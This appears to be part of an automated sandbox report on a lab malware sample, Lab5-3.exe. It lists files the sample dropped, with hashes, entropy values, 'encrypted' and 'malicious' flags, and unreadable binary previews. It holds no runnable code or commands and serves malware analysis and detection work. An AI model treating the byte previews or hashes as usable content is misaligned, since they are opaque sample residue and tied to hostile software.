                                                                                                          Preview:.a.p....eF.......lg(.-'..',fqf?U..f...ud....[..t.e.Q....k...\.s in.....E.6..U.N..y.^..z...1...I..G....zk'.. .{...).......A.......N.."d..(L%...:T.........AQ.u".xXu.N.(..?...*...3. .N........N52C....\)..UA..[.cU..t;....FG:.w.B.a.vH.q.'....nK....[.....j...#>...q.W&Yf... .&.z.$N...C$g~.<p....f..........U..Fa..P.j.<.js..$.S.FG.PPb.'......4Q.D.._.\.W\.+d6.fs..D....p.n...$t..h@..7.y..f.g....\H.|.!de.-......GF^'.&S....k..../..~...Z.Ax.a...-..Ny.fz.w..kc:.\..h..p..+..`)N....w....c.p..4..$......Bj..]..1..[tI....@I8..U.XR.<5...lg..{....ZS.z....o..+...i.(....sD|z.ZE./..{..=MB...@Q.A...M....~_.........+.E....l.s...[@r.zF...K2..n...n.D../L3....O..g..Z.....:u.R....:.j.}.q....J.....t....g..............i.m.|.....@.I......L.A.{...-F.L..3..9..}.....0..G..n!..MsB...9..oG... O:...f..b]..r.)...lO.c./..&s..\..b?......_a.R......K)~...=.8.-.....0z....[..wL..U......g..Cg......}L..F...'...4...r..].^k.v.+..,o3...<. iC]..YB.w.\.t4.0X.;_.....u.6.I...P^J.TQ....;....`...]j..b...P.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):133456
                                                                                                          Entropy (8bit):7.998419915632587
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:MJLG6apMtH8uaI2ji5WKEDtTTrFsZQ+hzJ3vZLQY23Z:MU6apMtbh8GcDdJ6lJ/JQH3Z
                                                                                                          MD5:F2093EAE99362EABD94D624C07F22758
                                                                                                          SHA1:F2FFD3909A8844825B12E7F81C4569BBD9513CFE
                                                                                                          SHA-256:AD6E66869F490B9ADAB52C4878DE457872DD90E4DD091AF9A43B199A324DB801
                                                                                                          SHA-512:D54055051EB28210456D03DF52F07AF5C400ABA2F329CDB28423953B9B39AFBC6A71540A5A4304F9555A08458331B53711345608F3D845830F8425F8D3B47D0D
                                                                                                          Malicious:true
                                                                                                          Preview:{..Tg0y7.]5a......R.:.&5...LO..[>..o..d..r..y-.HQw(3..]".4.s..?Z.A.U.8....1,v|..........g.N.%...M.s+ES.~......P....!v....9M..l:v...a.....y|..'$3...y... X.~...&+....T.\bG...1......b(|x.J.T...K?.".E!....j.M..b<%9j._fQ....Zk.P:.(..O..T,......(.d}i.....z.mQT.S..8.o|Z...~.xA~w29.m.&._...*....5Zb,"...{8>.<8...N...b..J.v.:.W"q.B`#\.7.a% ...|F....$.I=......p9._.E..CNz........GxJ..........T.......XQ.....w.P....M.z:J.w.m...-...S....P.....T..b.. ..........Z.e..!.....]...#.Q.G.S3.CA.m.MG2?.*.o7.......8..e#..@.M...7...\...GgF"&.l@.k...-.....(....&.`3.....u...6&.'7..A...o....;...=.Me.=6..-...M5...1...-.,XqYo...60k.5.@R{..GI..h.......QSz...Z....W#V.....+.....a..iI...fj....Jbf.!.......J.+.d.....U.........O*.C..:./..Z`.%...m ......T&A.{^.+F.._...G......{w.......CI.Y...W.y.~R.....y..-r`~.c..V.H..Y.q...3J.5..B..h1WJ&..J.<.F...!bl..EX....m.3.\../q._..E...[.<D5....}.o.m....I..].-J..Xln.$.O...H.A.....!m...<...C..tT.q6......{p[fj.....d..n....h....N.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4752
                                                                                                          Entropy (8bit):7.96556618045615
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:dJM4Q++quLWw2Q/sWTKzt7qXlU7/xlXvtQQGx0uKeY2ElUJ:fML+VuX2Ws8KwC7DtY0Cb
                                                                                                          MD5:BA8D58AA0894934B9662C660CE5C7B41
                                                                                                          SHA1:A5656D344ACB2A118D751F3A72666BF527EA931C
                                                                                                          SHA-256:74293313596327B8A69E7B6C3C300AC6C03732BEC9D87C2D7CA668A360EE72BE
                                                                                                          SHA-512:12CBCF3D1655F06498F6FF44C7B32463F9173EBFC7274A88E743A309203D23C5118850A213533E7B76D3B1406A09A0F90C06249ED05BD64BCE6DE9D437329972
                                                                                                          Malicious:false
                                                                                                          Preview:..[..T.8.L....{...-.I...`....C.8..?...h.T.....`..w..v,.....m...E.{k.tg.-f..x...6..2..K...Q~-....,/}...H..m.a..u5.......W...9..9G~.;%..Y'...eTPD...*O...G.....hd.MIf....`!.MB...Qm..'........}.Z...G8..|A.+..p,K2FZ._3.*....|.4C..."j...........-V.M....\.%T.....JP...$].....%.!..TQe/..(.u..n;$.kg1T......;|.#..7.Q.nV..l$#..c.............V.Q..92p....Js.>.Q0..w.Z...'}.Z.Iu........w.2.. G.7.2...bnDTM1z...a.....e..+...b..^<....,.Dn...^....rG.B..Kn..}#o....e...x-.{r.H\.+b"bd...+.?Z..#;#.I.l.4...XZ....wA....Du....f.'....fd....d..f.y...........:...&-......<....e.L...$....x75..dI...IAs.fE....*..!.s{.3.]z.....>P..y..Cf.S.$|)...m...`{j.h.M1.O@....>>..gB....fW&%9...?..'.....**g.S.N...X.....yg.Z.b....O.E.Q.=.jyk.7..{.~>h...r.>.\...4}\Uz...2<....sxQ.R$C.0p.9p...".b..]kO...`...;B..:..z....-...f.].d.H..H...O.../.D.^..jg.q?..m.4C.J`.._..I...h.#.3ajDZ...g.....!v."\.O.s../..U..]L..(......I.P.+...J......FP.;...4..#y...4..d..X..f;.s..n.@..B.$....[.........V.Zz.y%Mr7QP'
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):87104
                                                                                                          Entropy (8bit):7.997880440076047
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:UF82IrOMUbdsY59yUCQ2fwlmuNDdnNjGQOC2Qm4QJxCZ:NOpbdsY54UGf4pmC2QC4Z
                                                                                                          MD5:2C6B51E5CF8E4361C76BDF6CEDF1E71A
                                                                                                          SHA1:88CD87EA543F8CE5DF33C2FA1599EB7A818F7CC4
                                                                                                          SHA-256:F1E37042FD9225BAFA210B78467E520F5B119D963EB4556ABA4C7AE6719B1CCA
                                                                                                          SHA-512:E9CB853CA936E4DC18082727DB9C098812C22E4F0CCF5813000F5C7C6F02BF65B6FB615BFDD594DB96D4950AD186C51D118900486EED37E6CF576E0DFB2D8CF9
                                                                                                          Malicious:true
                                                                                                          Preview:.{:'.CMb........w....$.....l$.`.T..Q<r..8b.F..>..]...g........>.r....L.dM..x...I(....3d.......O............d.$.[..@.G\0.....s.....}U..M...Y.4.k....?...^.......3..c.......H.......,.s...A....C5...`...CJX".xe......,;S..)QH..v....nc..p3...3..l..FH\D.0..4'.D.$.....~N....Eu...r*?tJ..q.........i........[~.N...f..........X....`.....y....-..,.?........6:..g.J../...#..?.i?..g...OG ....&.....u...p..X.....i^I!.g..t&.Q.{C..f.WA....../E`.#..|q].^[......~. q..x\.4f*.....{.#h.I...4.......6:......R?.IEM..H.n.}$.....4.V._ce...s..V..i=........BJ....j,^I...r.|(......&.).!...F.4l.?....Cis..q;..-.&...%.W.<.l...B..2...."L*...0...E.0.h.w|h..X.}....e.. .... /+.&.R<.w.`...e.h....-l..r.c...r...].y.b..........`9%..._.j..{MH..8q...W..)...?G...fB.[.=...w..#.b....g~T`...s....9.>......T+}...#.8%....4.v......_......JR#..g....B.^...~..f...y..!.B.. !.*......I.........A..RF.cS..$.jDm...............:.....K[,8.Q....l...-}.V...=..{.G...P.y.H|..&..{.3.]s.u..8s.J.925....t.tr.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32048
                                                                                                          Entropy (8bit):7.994326047738561
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:i/hZzY5l8moDgdu6gzk0G8JBOIUu+QOXduoA2xZ:4hG51oDYu88JBOO/OtuoA2xZ
                                                                                                          MD5:C5D97B70644AF56A001A5598028EBA2C
                                                                                                          SHA1:E7B16FE29FDB7593B81CFF8B94CDB63669A8C185
                                                                                                          SHA-256:38166C143B17EB6976AD9C147002FCB42F19F78B88FF450D92BAB335A6E089E9
                                                                                                          SHA-512:96A2EE5C8D1118ACAC7415524DD59E9A1CA10BF20C37F8ABAF89A168988B81A35F78A06CA660EEA5A3D1C51B942467A2D0EC2F29B73DCAEE71BB5904E764B0DD
                                                                                                          Malicious:true
                                                                                                          Preview:..ObL......Ea..?..Vh....;F....^m.....k.4.%..cCuo.k..jk..*2..K....mm#..W.@........n......%.(..8Z..R..I.Q..d...q..iD.\d.G...Sa..-.>.o.......`......p#..(..)..dj|.x.......z..C=..1A..^w.C..2...^.._.[.N.....{cM+......@..y........dAOa..I..Cd2....#..b..x.h.J-m.=.....9@-.W...x....w`.p....<.K..?q..&.W..d.2..5.]ne........Z[K.......YM....tf...?..<..<.]<.;.R...~......Q..\v.....w.l.e%.?)..C...N{....6...2"$s....#.....nA.r.....^j....u.9.w@@...0)........./.F.,....D%\...:E..g..DeU.Ta................)..*....tT-.....0....}3...%X...h...w......I:.1..Rk!l.+.M.Q.W....pS.K.$]..S..f.tP..S[..g&fwg.m.N.M..M..h...d..<..+..r$.u..XGbo..!..(..{...Z.*...._......).U....f....[~....{...>..p..S.]..^.p..}...Eo..[vkS...w`.h5...5.,.=0.-.'Y..p.(Mv....+...X....8Q!.N1_.r....qQ....V.=1.;.....|...e..?.....z...]S^M..N#......x@........{P......$..mN.A......"./.........../}...[.....t....)..... .....]...8....[...mC#(..>.&w...*..lhx..|c..v $.c.J.z.O0.T..C.g..(...@cN|..h...aVk.4.@7.{
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM, 0x8C-variant)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):33504
                                                                                                          Entropy (8bit):7.994300690386788
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:y21vyEf1d+4h1adVDWCii4i9QxyzwwwLELzgbaAgw2iYq7zZ:y8v3ddDad1WCj4iOxyUPLELstr7zZ
                                                                                                          MD5:EC2BA1FFEB8F31912930C2E9517DEC7F
                                                                                                          SHA1:D6870E33123A14F0FF16E315B29DD34328CA22DE
                                                                                                          SHA-256:8721EDDD0A03CCC809096770E02CE433F0F36B1E26FC26A6A440A8487D8D082A
                                                                                                          SHA-512:9A9F4665511B247CD4D6F7A60E119EC1ECC2082B26398C69DDEB9097D8B18022028EE58B99675A52C554D45A8DDAD9820CFD9CDBDA47EABA43F619384FD6AE91
                                                                                                          Malicious:true
                                                                                                          Preview:..(..<.;Sy{%.-b....5c...FUD...LK.;:..R.w..K.i...5BK.D...#fsX";'N.M..^.$...,}..NBa.q.Z........@..g......S~...F..z...H.......tr.(.....A....XvS..].}..3.r..W4...HC..........1R8Sm.....~i...,..}4T...uV.....@&....6...S.....a:....pS8:d..:W.t......8../e'c....^.#.V.MR.O?!<.G1....['............T]Qw.U....w.1.......1o..]".g.....Y....o...?A...)..dk.L...'..$==..N.u...zN...kR..F.}}.{..a..C.=.......5'Z.nB.#v8E.UvW...\.._>..c.p.JJ ..C..=.?.{......M...'w.s.......C..?]8.......+.Pr.T.s...:...G17.n(.v9b7#....7.]5.....[......xs....(..:'^...J.O'U.*Vk....;.e..f=j...Jw...?{>..I.......i..@#:..shE....E...J......P..<4Y..g.4...@)%qwS..i.G ...a..:.\.*.../..%.........@f.k.j.A!.f....Y.P....n.Z........Y.VL(E...q.~.2U..fg{....3M..]......&q...'L..@i/.._O..6..lG..Z.s.B..f..+->......Al.......h.X..7~pK.O$b........P.8>....f..i....-....L.Z..s.._........C.Y.z....b.C.(..u;.p..M.B...Q|...._.3wrG...B.7..D|...n^q.`R......~.`.../.Q{.#=|z. KMe.i ..UM.o.:..ai....."........r.....CI@.8.WQ
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):33856
                                                                                                          Entropy (8bit):7.994476611142549
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:BggdkaZJM+gWeLEHpoVa6TSnsI9figQv5RJ/KrjUC1nVVvnZ:BgWkaM+P4IponoZS5RxcQoVVvnZ
                                                                                                          MD5:D214FF9D69B551F375939EBF2B72A1B7
                                                                                                          SHA1:BC97984CBBFC8DDF68E11F5D15A962EC0F6B755F
                                                                                                          SHA-256:AA3C3ED481A46107854BE7384626A154AA59D4D7590475516F520E32978A613F
                                                                                                          SHA-512:F4B9D402690AE76A84578157B00814F727970791F13936655B1EA9A8BF99E9A3DA11CC8463948706D2C504287CFAFA2F91FB17FF3FE6200E3C4165B5FA3777F8
                                                                                                          Malicious:true
                                                                                                          Preview:N....n.I...m.77..O.<...q:.N...;7...{...k... .........~.>...x]U1@=...?.@.a...1..X..:.6$../As.........zXZ@...5Hv.:}l..$.<.Y..oGw._t....._.%..V....^[G.?..:..M........*n...[f ...]4S..{......Vit.)L.".K..N.4$.q.O...Y..i.h.3h...H...6..m/..U...?U(....:|..O.8f\..?`.h..E......k.Dj....0.....Q....G..9....xz.F.Q=..8..<...0R?f.....MS..m..........V....%s..9..(i......9.c...^...I...G7.'.B.D........g.T.(..x!>Sy..l,.. .K..(.....W.~n..s.........3......6:7.HWk.,.|..B/..F..1..a`[.Nz)}y..4.%z...8......@bSH..].pW.....C.O..a...........)$^1..I..c.[...Fm/48v6)..5Hck..W1.\~...$....5.j.......[..<.9h;.5.9{.Xuh4..T...r.n........^?...a1..jF..........z.,.p..ab..(c.."....H..6...N......)..1>M..W..it..f.C4.W.KC..G.r*...^...$v....*...n......sq...g":..3..Ba..r(.^.%..p..U..w*..l..f,...........R.:p.D....)...p<.....h.et...o=...#..Fv...CH6.........e.....>..(i....S...."..C...8...5x{.#Xn....0}.....r...!.>.F.|)m.j.....Mo...CF...c..K...7.M..Iq...p...<......XE...!GSh.NQdc
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32384
                                                                                                          Entropy (8bit):7.994174670756593
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:FdA2LlDxnH/3bmR9Us5Zp8YYoYpLRtcxzZ:Fy2LlD9/L8pLCLPcJZ
                                                                                                          MD5:3557DE8B603834DF5BC87BE884923641
                                                                                                          SHA1:97A380183A45E469B4DD223A0C0D5404C6E93AD7
                                                                                                          SHA-256:FE4BD8E850352C6830A0AA81E00E2571E8494FA4714FDC388EEB9A700E929801
                                                                                                          SHA-512:03E88F37F27564B2A43118AF31C1DB32CE3481DE1ABAABC06712B89DDC6BB8BB1DEF090C8529D956725D3EF009971D8F06E6BAEB5B00AA22628B21F33E244C7C
                                                                                                          Malicious:true
                                                                                                          Preview:.....Y.|A......"X.w..j.....:}z..rJ\.......H..*&...)G.).H.r.%.+.Cs.wX.)..-....3QL,...p.....p...:.+..N...&d6+?.b...q;./yh.d2.u;...S.....uI}}.lM..t.s2).....`T|..e ....`B."..J.... ....'...&.X..f.....7|....n..}.....).....V.....X.GXy[ah./..x+"..G1........-.!.O/Z....f.d....L....3..=L/U...cM.l.....>.f..n..u.xAt..C.i..A.?...!.O....L..^vw.ML..)E._...Y....l.<36.....&2.7.T......N.X..he..........$....41..Hr.?..A.B.3.P...n45..pi.Ap2......f....l.Z..<...VkW"..r5..|r..^Zt.......G..5.s...:.=..%....@\.Zwf.}.[|/.X6....}.t .:6T(.N.K........z.Z{....d./c ,fP..O...} .....*y@..[...K.....egR.w.jM$.t.t....7J..[1.lNV>8X.."*....h9.d...oq.'...5.e,.R.V. .Z4.`..x.o..f...Jk......39/U...z.>...~.AJJ=.....Wd.=..{....5..4.p~..7...._.Z..tS${.y.WVs.Y./...V+..(...&.._..8B......}.F.....`.'....Q...64.h.@.uF..",j...b..X..z..(...2.B.....#....):....Y.~....> ..b...)&.CN/.6.e..E6..k...p..y&.....q...[#+...:pq...9....'.][X......b9^z.E..-k...Y.A6 V....W._.d...y.`...8..G.L.!....A.!=.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):211840
                                                                                                          Entropy (8bit):7.999124170817121
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:b0LQiE8WwN4qLnoYE6oMlx91q9d3VSIl26/gZ:buQp8La+noYr3xgjS76/k
                                                                                                          MD5:5BD47F061005EF67FC24ADBA877B9744
                                                                                                          SHA1:F171CCF7BCCE925C33C506EFF38CBB737FA0D52A
                                                                                                          SHA-256:8EF1259F82E126A46DA8904D97D6DEA88082875F5A873020D7E28A4A9D12F7A1
                                                                                                          SHA-512:9AB8842640A1E7AE9F6CE2BA6223D2DD0C702A668752228B5DEF957E775B61D1B377BA3169BD6B2CAF581B483C7CDA286686553C15CAF54FFA413941D987F99A
                                                                                                          Malicious:true
                                                                                                          Preview:.7......&H..P.....&.....1..&..q.%.?a..H.s.d.W^.)....W.q.X.sv.O.x.D..U..u$.Y.|t...........ml..{&.|.......^...8.*..u!V.4Z6..d...Y.C...*..\jQiA.u...,....YK.`..D....*AN%..e...A.*....qw..D$..*.../.........C...I.[pt.e~..&].......~t,Z..5.pG.....^+..Ac..#...|.:.CI..lh.-`%.[.(Cd6.=..M:f..G.V..(be.........#LW.6.:8VJ.8D.W...s...Q..z........{t.k..."P...os.w..w..f.....hv.v....._.xq9*A.7....*k.j..oj...>.....]V..@..=@...@...>.~...n-YK....x.*.obD..Ky.XX]GO.s...i......|.M.....):#......(31.$......w.E)<O.].,........._.`...71..wk!JB<.zTN.......:.C|.G!.'~U(.G1:W.P.o.....q.|.*.O.qpO..`Iu.2.#......X....X..$N;}v.5\.!S~O..>..5.hs.r.....%t...s.J'e....Bd..].......P...[..u...V...c.LiH.>......QR.....z..Z..*"\......j#...q.(....N.......Z.(.g7.M.1k>...O....p$.4.l...{sHky.....AL......T.....].M..[.(sdVV4.u.....K.a.y.42:......d.....x.U8.z...p'.....K.R...(.L.....7...4;.9.../=.:..|..b.:d-..-.U\...P..v.(<.....t@.......zK.......I..P..l......x......#.P.q.J.BF?2D.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):212368
                                                                                                          Entropy (8bit):7.999137683812204
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:WJuasp19lAkxuO8DIEE+kruZHBg9sit6MZ:Woas/9i7DIN+kruZhg9sA6w
                                                                                                          MD5:80E1DF9B44D1C7CC9F2084DC04B87227
                                                                                                          SHA1:0D6ED9C7B8F7CE13C3DF191AD5DDFC83AA64892A
                                                                                                          SHA-256:8BE94F34806EF82027EFF7030078D688317C9027FBDE1CC5A784F2DF7B79E593
                                                                                                          SHA-512:F7E3C3084B4B243D39C85B4EE50EED3A118F23A5FB67535B6B8715C501F8FB25912835BFF5B3E0F77C9D3FB27D1A0E5A7BB14313944782FA93E4B6ADD9C03709
                                                                                                          Malicious:true
                                                                                                          Preview:^....0...>!'Q.V.*.E....GC4..@.7&...Y.9.\^.....FJ..@l..{P.% .r.q...$.s....C3!...+..[ch...%_.....M..6.--...a."x....H...r.jT.}.&..K.........e......9..5gi.B..k.r&....QG:..^......./vP.q....|N....T........|...[..F..dsD>p/....c.....5;W(....zdP.+-r.w.4?.u.EITbg.E...GH.,.dWq....m}WM...M.........#........._a.26..b..5....Z.=..(I..j^S@..f.R.|.3cXW6.L...5.ppS.|.VN....5w.I;8.5;'........p+m4.C.$...a..N........J~a....<(..d.P..5......vY.....yk".kJ\.......M.......y..5l.[...N.u.,>..$.. ...]...T|.D...:..my.....]....2::...'...<....M....e.Og...*x.N.$...k.1..F.d...B.@..|..M..Q8L3_.... N.. ...Q.?;..}%....$z.....3.W@..o.[0.D%I.[...E.a..z.N...7T.A..A.c.a...6.F}.+p..%....\.$....w.V....R]...=j9*M......H!.&.....T......h......~.EM.... .......3......U..CX..*.J./..c..L..E....>.e..l..L..A>...r.......:(83.*x....F.....;..Uw..`.."..`...r...`...o..Q..oRU..X......v.yZ...r.-.\c....X%Y.......l....Q.x...|X'."..]3....8."n..A.)M..%\@..P.2...>..{....m.[.[.4.7..&sC.....,h....T..5..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):92016
                                                                                                          Entropy (8bit):7.9980047440978455
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:B+7XjSgfox2NA9G1asXb7pthqnALapVO78rpGZnG+6rEjI8VZJaVXRWbzEtKOZ:A7jZi2690bhLaf7dGZnG+6kI8VZJVgZ
                                                                                                          MD5:84F821A24E00DD2DFAA2173259DBF163
                                                                                                          SHA1:0987521A7387ED5A885EFB46DD8BEF3E85473383
                                                                                                          SHA-256:F25DAD3E3F8053911CBBD45FA587D8B052A204E920DF7877B1FE42A162C22184
                                                                                                          SHA-512:45460EB25379C9B00593D00493EFACC28547DE7AB0FD8C864FEBC49FD21D8175EC4CE2544ABABBF85EC2403A651D6B323680487E76F25232B08426BEB3783E25
                                                                                                          Malicious:true
                                                                                                          Preview:..../......._R..5.c_...(...].....>.8...T...ZZ?.r0.W!.j{...l.......9..!6G...s..u...x.y..Zv:...?L.i..~..w....z1.(.d.@aW....h.....Q.....j...5.......>.}.T).6..).i.}.....).b...8$)C......|(..-.T.H..x..bz.._.oz.^I:.%]....9...<..$......j.l.....C....y."_R.PO.l_.(.....X<sh...t..m.......)....fM..|....Q.W".T.I...8..lt.S....@i... .....d.2.;....\dq.......Y..{...xf....S....!9P......K....n..I%.Q.F...L..yWm.....H......^.{I..!..&..ZE/m..H.L...L..B.p..cG.=Y.U]..f...R0qu.|..t..\b&...,c.U..J.4Va.8...;.y...8.N...1`.........7e.ng...u.......$G..LI>Xu..S..A..H..+.Y.b...y..J.L...=D...J..=..Y...<Q...&..............^5....=.A...2l.c%..l.\a..1T.|..>h"......@.~!..W......j..T...{..Z...ty....1.n..u..YV!.k.....W.....z.|....^..-.]}.. ....b.DaJ.P..~@...|...1x.}.Ca...x.....7.......^.... Z..<:M..WV.a*.....9....._].Hx..g>..y..$..^..A,5......o..JO.g.k`(V.`.3.q.b ..oO...>...WB*}O...w#t`06[.|..AY...J,....0.f...;.""....S#.@.M.....J!b.....4.q...Y:B_tOC..._J@kaZ4..C.D.)G.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):94192
                                                                                                          Entropy (8bit):7.998388192730916
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:+ATOKrRLG5d4kDvV9iG+NCx/JEFbUw9w1sq7TXMB3W4bj30ujRlI6TUSqfjJ+Z:+EprRLaGkrVYqJEqw9ckE4dRq66rJ+Z
                                                                                                          MD5:43BD398D5E054E578262E073EDBD5B73
                                                                                                          SHA1:125F660989883B7A6F30F2EFB246473BD0B21907
                                                                                                          SHA-256:9FE17F694C6863E0913BC2D82A41D163AA93777D1E1B203212F6397010A98988
                                                                                                          SHA-512:AE4B0E37DD16B6ECB23DA7FA9F84077105D38FBDD008EAE95F446AEF35C60BF63F23E6A1757278D70013843329A2547E25D54A8764A4468F1FE18A61A3F40D17
                                                                                                          Malicious:true
                                                                                                          Preview:.M..z.....]....<.nW..?o......Gc......X....p....n....B...5.U.%.'./..6...K.dz....d.k..hZxu.Z..F|...$[A....Mw.[rb.!(.,1.gRD.......L..F.....s.^.$amC-..\=v......"..K.`...v..h..r.........)80.b|{....&U.}Y"..h... *..`#g...5<.[CQ.Um.>..<.@.y+..S......hq....y~s..j........%....C.).`7W.f..h.. ...K.-.n.ci{6.......mh........l..<W.. )......2.W=..H.".....T........#.=.i.(... l.].].m4xaB.G..5@..#.CG|.4...[..P...4.......r...z..C....{.\.z./1>...F.t....I`kH1-B..[U,j..;XQ{tv.S..U..I.0...NF..s.jr....W...e.6{........-....Y.L.y.....J/.....P...xkZO.L^.wL..k]..0...Q..p|H.Ut..6.v.kZ7'pS.O"...(v$.....x.....4 ,.i...{...;.|2;4....k..I.>L<Pj*0..?...X>..EO.vz.l..E\......._._~.i....H.V.....@&^4.f.....E..D.m.!..u.3C{#..U'...O..6.....L..a...<r.D.WV.,..l.)L.....b.O......s..UA[f.O@.....!.D[..D.?..X....0kB.J*.f.......[M.../.t.A...)%5.u...U..[....l..y..Q].6.6J..=."A.b@...4..[..,7......F......<.%.!.F....!{...{].Vh<[..*..FcM.OG.........`..5.......nBm..n)5..y......A+.........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):91968
                                                                                                          Entropy (8bit):7.997874415630621
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:lbMEx3mGQN3nl8JHWDJMQR2FCrL0A/mQ+ew8M0114SP8K9ViruDcZ:6OWFN32HoM+jmdew8MHSP8K9sIcZ
                                                                                                          MD5:DCAB2086BA700895C027D496C581F612
                                                                                                          SHA1:16856F867904A4D13026EB07EBC6E3BF8941193E
                                                                                                          SHA-256:AA3B06067EBEA74629F6B8291F0E421057AEF671788E7E2C5A1E4EC65539FA43
                                                                                                          SHA-512:5F2FAD26D7198AE23343418AAEA32CB5695DE1CD3101A100CDC7FE9EC3B0B42525ADEB1CBC94AA769A6BE952484486C3BF01075B4B40A89539E76C764C489E19
                                                                                                          Malicious:true
                                                                                                          Preview:^.jf].....Db..C.x...S.-.....l.../.,*m.M..kd.u.&B;.r..j..h..+.|.J..j*..G...`z.;x...{..}V.d.Oz.......Z......|.N..........VH.0.u.......Uwgd].....?J@.......m.....m..|.7..h.{..?...w.!......P...1...;..Y....Q;a...@.m....P#Xx[.....j.M/..K..8......Du....(4.....C...@..D..~..~...+5,.....&.....)!.,...}..A..s.....pO..L..?U1B....x.........r....G.-..S...Q..'..-...a..Z.v+..A..,._..w....o/..!..=...EC.s...lr....$!)$.....3q..Z.kk.-.4;o.. o../..",9.V:..?..l.$`....u.s..M.x.S..^.*....K...y...k....Z.Qk#..].@:ew..=Q3..R.-q=VR.GRwE0..7........(+h>....... e...vJe.U..6I....+.o.A....oxMT.~`Q....)%.m...P.p|{;FV.bnc.a'N[o?....X.6a.....x.b.f..L...........0.bC.Jt]...J.{.d}*../GN..&.e..N...0......,.Z.ij.W%..@K....t.2.........4......~:b}...( .#Z.....gF<.e.`.j....A......Y8..y.-..Cj.P*t..${..8.Z..x0.!s....i&.....:3..V..n.}&...7....`..o...P...1j.;.3l....P..n....Z;6.(i.9O.j...I.l.%.@.h..K!.u.?}..|EG.@....n5J.....^I...M...*a.9_.....n.?.Yy\._,.!-..}...gT.......t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:PGP Secret Sub-key -
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2224
                                                                                                          Entropy (8bit):7.916022493950693
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oPNXrolzcqtnZFjxEgBkCAetHfUTid3hBaUoSGFcmeykEdEElU92i:MX0l7tnZRxEg+xTGx0uKeY2ElUJ
                                                                                                          MD5:D42F096850CD37500E7E707F6CF4D9F9
                                                                                                          SHA1:3BCFF1CF1BF49099AB19E8B162CCA174293CBCC9
                                                                                                          SHA-256:D41FCC19F92940A1F9994B3373E1BD4D498EFBAF697D641883C630185F81416A
                                                                                                          SHA-512:E5D5F62A463427F0260A191A9DC18C4D1C3A4B118132940EB3759A81E120C1202AB21EE812EC2BDD3CC96EE01860AD2ABEFBEC89F1104087F843180B0FBD2792
                                                                                                          Malicious:false
                                                                                                          Preview:..yE$...Q Q1.z.........B4..I.......^"4a..l.5"$.u.d.Z..>....EG9.00r...........=....wt?R..._...s....4..Q.X%s.;+..].#,.Z.....z`?.x.dv..0.~1...y.+..G.....5......].y.....l.F6d@<w.m...B..{.......L.e...|Fj.F....xM.%TV..;......_.-<.+......Yn[.j.S.r.|.IM{so....J.5g.b)...j.".C...k............n...9.....Y..7.B..."....V.W-.H.p.H...H.....jp.%D... ..AS.x....G.{..sl..].bM....3..~s.............f.>.....3.......,.[Bq..r!.\.G....."b..qk.r.r..p.Y..*.R.;&Y..y=y..Q<.d....WT.N,7..5EJJ....kyG.......5...Eh..o...].=v.Dy.d..c.E...@..y.@....L..u..?...0.....0..$.....Y.&L..G..<.<.j.@.....r..Z......K~"..M~U2;..G.!..XEz..3......C..4k~.[.D....{C0D...^.SEM.....+.BvM.D!w..[1...cfFN.'.D.N..k..@.(.,.~.O`.7.j".=9.......X,....T&k.h.bBk....g39..In.3..n.@p.H............M.{>Og......e..t.9.....45...N<..-F:..7m. f.}S..n.o...K.......l....A.d.]."dw.o.r(.Ed.?c...P...=...<..9@.pk....3.3..8'...w5.....zj....\....I.@Y....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.914098994452532
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zMn0paPJ3Wqf7HYyyum0SO/6HfUTid3hBaUoSGFcmeykEdEElU92i:IpL07ffOdGx0uKeY2ElUJ
                                                                                                          MD5:F4B8B1F5552CF268A4AF5BD388F7BACE
                                                                                                          SHA1:D0F5EE316B447232C4018D310152B8A75C80C620
